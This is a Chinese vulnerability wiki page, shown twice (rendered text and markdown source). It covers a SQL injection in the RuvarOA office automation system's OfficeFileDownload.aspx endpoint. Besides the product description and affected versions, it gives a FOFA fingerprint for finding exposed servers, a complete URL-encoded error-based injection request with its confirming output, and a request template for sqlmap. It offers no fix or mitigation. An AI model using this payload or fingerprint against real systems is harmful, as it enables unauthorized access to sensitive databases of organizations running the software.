fofamini-wiki

登录白背景

源码

RuvarOA OfficeFileDownload存在SQL注入漏洞

一、漏洞简介

RuvarOA办公自动化系统是广州市璐华计算机科技有限公司采用组件技术和Web技术相结合，基于Windows平台，构建在大型关系数据库管理系统基础上的，以行政办公为核心，以集成融通业务办公为目标，将网络与无线通讯等信息技术完美结合在一起设计而成的新型办公自动化应用系统。RuvarOA OfficeFileDownload存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。

二、影响版本

RuvarOA v6.01
RuvarOA v12.01

三、资产测绘

fofabody="txt_admin_key"
特征

四、漏洞复现

GET /WorkFlow/OfficeFileDownload.aspx?filename=1%27+AND+6729+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%28106%29%2BCHAR%28122%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%286729%3D6729%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%28120%29%2BCHAR%28120%29%2BCHAR%28120%29%2BCHAR%28113%29%29%29+AND+%27MLnb%27%3D%27MLnb HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36

qjzqq1qxxxq

sqlmap

GET /WorkFlow/OfficeFileDownload.aspx?filename=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36

原文: https://www.yuque.com/xiaokp7/ocvun2/sfr578aiks1adgaq

# RuvarOA OfficeFileDownload存在SQL注入漏洞

# 一、漏洞简介
RuvarOA办公自动化系统是广州市璐华计算机科技有限公司采用组件技术和Web技术相结合，基于Windows平台，构建在大型关系数据库管理系统基础上的，以行政办公为核心，以集成融通业务办公为目标，将网络与无线通讯等信息技术完美结合在一起设计而成的新型办公自动化应用系统。RuvarOA OfficeFileDownload存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。

# 二、影响版本

- RuvarOA v6.01 
- RuvarOA v12.01

# 三、资产测绘

- fofa`body="txt_admin_key"`
- 特征

![image.png](./img/2LbGkTrAfPe0Ry2U/1715412038765-d7c66ac0-f855-49ad-bc97-9b535cebff1d-486357.png)

# 四、漏洞复现
```
GET /WorkFlow/OfficeFileDownload.aspx?filename=1%27+AND+6729+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%28106%29%2BCHAR%28122%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%286729%3D6729%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%28120%29%2BCHAR%28120%29%2BCHAR%28120%29%2BCHAR%28113%29%29%29+AND+%27MLnb%27%3D%27MLnb HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36
```
![image.png](./img/2LbGkTrAfPe0Ry2U/1715415521641-29b7e130-a43b-4349-86d2-1f4e374174d2-384404.png)
```
qjzqq1qxxxq
```
sqlmap
```
GET /WorkFlow/OfficeFileDownload.aspx?filename=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36
```
![image.png](./img/2LbGkTrAfPe0Ry2U/1715415542528-c26bca7e-2651-4069-843e-d8017557d6cb-208278.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/sfr578aiks1adgaq>